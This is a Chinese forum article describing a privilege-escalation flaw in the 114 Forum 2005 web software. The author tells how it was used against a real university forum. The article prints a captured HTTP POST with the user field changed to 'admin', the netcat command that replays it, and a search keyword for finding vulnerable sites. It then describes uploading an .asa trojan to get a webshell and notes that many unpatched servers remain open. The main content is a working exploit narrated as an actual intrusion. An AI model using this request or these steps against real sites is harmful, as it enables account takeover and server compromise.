114论坛2005正式版漏洞

所属分类：实用技巧 / 漏洞研究阅读数： 1178

收藏 0赞 0分享

关键字:
"版权所有设计制作：网站114"
漏洞描述:
网站114论坛 2005版正式
/edituserdb.asp
对提交数据和cooikes缺乏验证
导致任意用户可以修改管理员密码
默认后台admin/index.asp
今天在旁注一个机房的机器时用了一下。
http://www.***.net.cn/xzl/BBS/index.asp
**医科大学网站上的一个论坛。
注册了一个用户33221.
然后跳转到 /edituserdb.asp,单击“修改注册”开始抓包!
用记事本保存抓包内容如下：
-----------------------------------------------------------------------------------------------------------
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
先生
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
修改注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

------------------------------------------------------------------------------------------------------------
其中：“
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
”
修改第一个"33221"为“admin”保存11.txt文本为：

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
先生
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
修改注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--
这里因为我注册的用户名33221与admin长度一至，所以这里不用修改字节长度。
然后用nc提交到服务器
nc www.***.net.cn 80 <11.txt
返回提示修改会员资料成功。
然后用admin 密码为申请33221的密码一至登录。
当然就是管理员权限了，然后登录后台，点击“修改栏目”，上传asa木马，ok,拿到webshll。
看了一下，这个论坛系统还没有出补丁，可以拿大批webshell了，不过我只要了对我比较有用的一个服务器，其它的没有去抓了。

更多精彩内容其他人还在看

114论坛2005正式版漏洞

对Serv-U 6.0.0.2默认帐户及密码的一点理解

用asp记录论坛用户密码(dvbbs,leadbbs等)

网吧破解:让你在网吧上霸王网

关于对河南网通封锁局域网共享上网的破解

网吧入侵之攻无不克！

老兵新传-各种漏洞的利用和一些搜索参数

用漏洞提升计算机控制权限(图)

从广告邮件到肉鸡成群(图)

JSP中的源代码泄漏问题

河南移动网络客服系统验证码的缺陷分析和利用!

网络赚钱

站长故事